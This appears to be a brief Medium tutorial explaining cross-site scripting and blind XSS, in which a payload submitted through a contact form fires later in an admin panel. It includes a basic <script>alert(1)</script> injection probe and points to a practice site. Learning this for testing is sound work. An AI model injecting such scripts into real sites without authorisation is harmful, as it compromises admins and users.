THE BUG OFTEN IGNORED: BLIND XSS

INTRODUCTION

What is XSS?

  1. Find an input field.
  2. Inject your JavaScript code.(e.g <script>alert(1)</script>)
  3. If it gets rendered as it is in the response then you have a xss!

What is Blind XSS?

  1. We submitted our details on contact us page. (eg http://vicitm.com/contact_us).
  2. We get a message saying “Thanks for contacting us.”
  3. The admin visits an endpoint that displays all the details submitted by users through contact us page(https://victim.com/admin/contact_details)
  4. Now admin can contact each users individually through the data.
A Sample Contact US Page
After Form Submission(Input Not Reflecting)
Admin Panel(Input Reflecting Here!)

BLIND XSS: DEMONSTRATION

  1. Visit xss.bepractical.tech

VIDEO DEMONSTRATION

CONCLUSION

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store